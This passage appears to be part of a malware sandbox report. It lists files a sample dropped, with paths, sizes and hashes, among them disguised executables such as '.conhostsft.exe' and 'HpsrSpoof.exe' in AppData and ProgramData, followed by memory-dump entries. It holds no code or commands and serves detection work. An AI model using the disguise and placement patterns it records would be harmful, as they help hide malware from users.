67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostsft.exe
Filesize
369.9MB

MD5
a437b3c456115477dcefce7a814d8124

SHA1
5b0a3d5b589ede199d722998f087b43b65877adf

SHA256
0cc94139ba285eaaef0bc728b4cb32cb8627c70fbc191257f911481acfe289e0

SHA512
a7b2ec03414ca53020caefaca5bf391d258709023cf19b91b44a29914cd7afa46c0a75a1233a1c269316f8b60807d0df36c5478ec165744c1a157a4c901d0f65

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostsft.exe
Filesize
372.4MB

MD5
2978a34fe3c5ca9746c930286dac6f96

SHA1
5e864d143f06e0459a2d863b8c2095cbcddd9d9c

SHA256
1e8fd5a272116a492388bb12a26240c77b091c4452c6d3a98ba8e3a5fbef323b

SHA512
ad1e9a973f4dd4a9ee3d4e3031c0cff2e55b57c74722903995489d38fca3f9eb24bb3ce5c3dc323068b55e10fb0290426e058e0d0e99ae951af2eba649168301

Download Submit
C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe
Filesize
372.1MB

MD5
828e1007f874536034c949fe4d685533

SHA1
0a4f8724e1caefaa35f8dfd6fff98c82b2457094

SHA256
566492b1b5d4982b1b45dc0953ad6ea5f48834684e71db5859a952cb493be462

SHA512
4bc95d0f1d5a363310cc425f3a4e001527884e7e1162d3b4cecd7dd541278d898aa323e2cec9a95ccab341e341434e8c61f800d3f5605aa0bbf65e2934123698

Download Submit
C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe
Filesize
372.2MB

MD5
639203329bba614e544d960e5b1a481b

SHA1
19ccda295b2843ed07609ad3202ac166db792055

SHA256
bd2786d4418c4db7bdde0d60421f5a4b5c332b932b8fe4af42b6c60d363e1244

SHA512
50a77528446d6a1e24b24ec2689079859df6450261d853b937ed31fcdf0d007a63d7e4e8eb53ecc66dc6e2d3059d30ad3ec6a2e0dd910bcc4ab8d0119937a899

Download Submit
C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe
Filesize
374.9MB

MD5
53ccdf675865581aed61c5fe50e0a100

SHA1
85a44623f63b3ef68f1dd32f0e1ea1f7d5a84a11

SHA256
dd302279197a047da6e33ed4e395a4597fd72b641462539107e74afd4f3f3222

SHA512
68526cd067717c374826ac28b097a6fa7f286a823814cd40fc2f63f3ddda3d1f83efac08c61bf648353a48c487c7d2efbc1063f7dd093a03cdc1ce3f65162de2

Download Submit
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
Filesize
905KB

MD5
dd1313842898ffaf72d79df643637ded

SHA1
93a34cb05fdf76869769af09a22711deea44ed28

SHA256
81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df

SHA512
db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
8099ce6bcfd98524539fd2be20caced9

SHA1
59830a897cc6d8e4aa381bf9dd3ee24bca318730

SHA256
0e4a8a48e503ec5161f06e7e079856cc1350b3e9de1651e85a4901ce170fbcac

SHA512
8d67958c7ba82efe3620127220cb9e91f27b59423f991a2a95ebb60a901359d7aebf8f6c85c9bdfb843f1d06952e5f799ad89fe67fd1cf9ac6636b269008e1ab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\COAX9JS8H5O2JYP8V3E4.temp
Filesize
7KB

MD5
2dcadd73b448ca4185036ab41c9146a2

SHA1
24d22108a17a9343da671d73680657012d66e88b

SHA256
81244836f42bad2a80240eeb48c6a9306131146ee443092f07c9cc23717b6dc6

SHA512
f693986e6d6bb2167c1d3ecac47a74395556ea665aa2bf37f38fe3eea0c6e87ad0fb729ded2517c8568e7a1bf52a7369d19d671a07dd972459a786634e6c54c3

Download Submit
C:\Users\Admin\AppData\Roaming\conhostsft.exe
Filesize
3.1MB

MD5
975eca3793d5ec51d4bd4041fe4bd595

SHA1
f3b36aad3566d36a81cb8ab11c49e28b8fbb807e

SHA256
50a29176f61d2567c67f234d46e2815d0fac1ccd4a6f7577a47133543bff67c3

SHA512
af6f4f07bf32b5aae8b2f21b5d8a8a84cb6e72c73745019729240fb2d94d0b45713a05130dbc1feda2543009705e13f915106a168828d624845b20f6fd7f6c89

Download Submit
C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
Filesize
2.8MB

MD5
160e78de6a5de39a29e3e761217d715e

SHA1
135623988ceedbcbb4fcefad6c129499c19f44b2

SHA256
20b1fd569317f848664cc50f09777f5ecbebe639f3c5dc0f4dbe92ecd0dc917c

SHA512
449a1afc30728fc0b0f15d7c073e8fa77f2fe63b3c8f929d49e4f3d631282d6a7e7f9078f481342a83668a209048182eeb818afe4c5e0c352de0181f5be2eb40

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
Filesize
452KB

MD5
c4d09d3b3516550ad2ded3b09e28c10c

SHA1
7a5e77bb9ba74cf57cb1d119325b0b7f64199824

SHA256
66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3

SHA512
2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

Download Submit
\ProgramData\Microsoft\Windows\DevManView.exe
Filesize
162KB

MD5
33d7a84f8ef67fd005f37142232ae97e

SHA1
1f560717d8038221c9b161716affb7cd6b14056e

SHA256
a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b

SHA512
c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

Download Submit
\ProgramData\Microsoft\Windows\Volumeid64.exe
Filesize
165KB

MD5
81a45f1a91448313b76d2e6d5308aa7a

SHA1
0d615343d5de03da03bce52e11b233093b404083

SHA256
fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd

SHA512
675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

Download Submit
\Users\Admin\AppData\Roaming\.conhostsft.exe
Filesize
384.6MB

MD5
161c49b69e29f3893d7bf5e690f8ab23

SHA1
6eb85864b6482a045ad5eca74edd7e0a79cff748

SHA256
0dd2fa2240e4a504e7461226ab5c37c30418170f035748a385f1afad561b76eb

SHA512
dfc2f11d27b4ae8b54c65eb01314e4fe4d7f87330a3fae6127bb1a6244ff846387562abfd604abfbb3274616a4515f04fbf9bea10bd2222124bdbf5a01ff04e4

Download Submit
\Users\Admin\AppData\Roaming\.conhostsft.exe
Filesize
372.1MB

MD5
18c1ff8eca4bf9a790e261ce746b6b68

SHA1
627a3f999e4e1eb4f741bf1b014a2f3f40b7d620

SHA256
05204eba494a8fdfc952d4be96e05c8d8bb9a792e50139ce95f088ea0042119f

SHA512
3eee1d2c3943d0e99e5634816c15546ef63c3d3c5784b764fafc4deb2751e81d455f5e08de2ae4f1cc13a6d64d525598153e38e5f3205aaea1c8ead579964df2

Download Submit
\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe
Filesize
371.9MB

MD5
558aab3bbac3a1080c1f5b6074ee668f

SHA1
4659626b80966c9517ea665c87ed3fcea14090d6

SHA256
9460d02a5479550a7ba304f1c8e9113462a057cc055c2b980733a8d5485899a9

SHA512
4ac679fc621a67790f66265fc8062cb8fdccd0abe18fc47fd785caf2ff6c5f183b550c397748192a214290a79b5efc3dca005f6022d4a835253600a3a8cd0c8f

Download Submit
\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe
Filesize
373.7MB

MD5
caf4fc11debfdf5e5cd42ce85d8d0c26

SHA1
e76e572df25b545d79f15ce48c06389a167b7fca

SHA256
71d64c0e9dc73f305111db334974ff0d8dcb7e79d87df9068b2bad496ea4986e

SHA512
3a80e7934c428ef2785eba0610dbb28fd77930f62f1fafd3d4ec3e9938cf4ade3f01dcaaceee85a90c314ec021e6ce60fd34108b14883af204db88e18d65d646

Download Submit
memory/540-303-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/540-296-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/540-298-0x0000000002CA0000-0x0000000002D20000-memory.dmp

Filesize
512KB

Download
memory/616-299-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/1400-385-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1400-386-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1400-388-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1400-390-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1400-387-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1400-384-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1724-304-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/1724-301-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/1724-297-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/1780-302-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/1780-300-0x0000000002DA0000-0x0000000002E20000-memory.dmp

Filesize
512KB

Download
memory/1780-295-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/1948-1-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/1948-2-0x0000000000E40000-0x0000000000EC0000-memory.dmp

Filesize
512KB

Download
memory/1948-3-0x0000000000150000-0x0000000000156000-memory.dmp

Filesize
24KB

Download
memory/1948-8-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/1948-0-0x0000000000F00000-0x0000000000F2C000-memory.dmp

Filesize
176KB

Download
memory/1960-161-0x0000000000470000-0x0000000000488000-memory.dmp

Filesize
96KB

Download
memory/1960-169-0x0000000077450000-0x0000000077451000-memory.dmp

Filesize
4KB

Download
memory/1960-177-0x00000000004A0000-0x00000000004AC000-memory.dmp

Filesize
48KB

Download
memory/1960-175-0x0000000077420000-0x0000000077421000-memory.dmp

Filesize
4KB

Download
memory/1960-174-0x0000000077430000-0x0000000077431000-memory.dmp

Filesize
4KB

Download
memory/1960-173-0x0000000077440000-0x0000000077441000-memory.dmp

Filesize
4KB

Download
memory/1960-154-0x0000000077490000-0x0000000077491000-memory.dmp

Filesize
4KB

Download
memory/1960-153-0x0000000000390000-0x000000000039E000-memory.dmp

Filesize
56KB

Download
memory/1960-178-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-179-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-180-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-181-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-182-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-184-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-185-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-183-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-186-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-187-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-147-0x0000000001250000-0x0000000001454000-memory.dmp

Filesize
2.0MB

Download
memory/1960-171-0x0000000000490000-0x000000000049E000-memory.dmp

Filesize
56KB

Download
memory/1960-148-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/1960-222-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-235-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-190-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-168-0x00000000003C0000-0x00000000003CC000-memory.dmp

Filesize
48KB

Download
memory/1960-172-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/1960-258-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-263-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-164-0x0000000077460000-0x0000000077461000-memory.dmp

Filesize
4KB

Download
memory/1960-166-0x00000000003B0000-0x00000000003BE000-memory.dmp

Filesize
56KB

Download
memory/1960-163-0x00000000003A0000-0x00000000003AE000-memory.dmp

Filesize
56KB

Download
memory/1960-294-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/1960-157-0x0000000000450000-0x000000000046C000-memory.dmp

Filesize
112KB

Download
memory/1960-159-0x0000000077470000-0x0000000077471000-memory.dmp

Filesize
4KB

Download
memory/1960-149-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-158-0x0000000077480000-0x0000000077481000-memory.dmp

Filesize
4KB

Download
memory/1960-155-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-151-0x0000000000DB0000-0x0000000000E30000-memory.dmp

Filesize
512KB

Download
memory/1960-150-0x0000000000330000-0x0000000000331000-memory.dmp

Filesize
4KB

Download
memory/2356-305-0x0000000002900000-0x0000000002980000-memory.dmp

Filesize
512KB

Download
memory/2876-16-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/2876-9-0x000000001B4B0000-0x000000001B792000-memory.dmp

Filesize
2.9MB

Download
memory/2876-10-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2876-11-0x000007FEF24D0000-0x000007FEF2E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2876-12-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/2876-13-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/2876-14-0x000007FEF24D0000-0x000007FEF2E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2876-15-0x0000000002820000-0x00000000028A0000-memory.dmp

Filesize
512KB

Download
memory/2876-121-0x000007FEF24D0000-0x000007FEF2E6D000-memory.dmp

Filesize
9.6MB

Download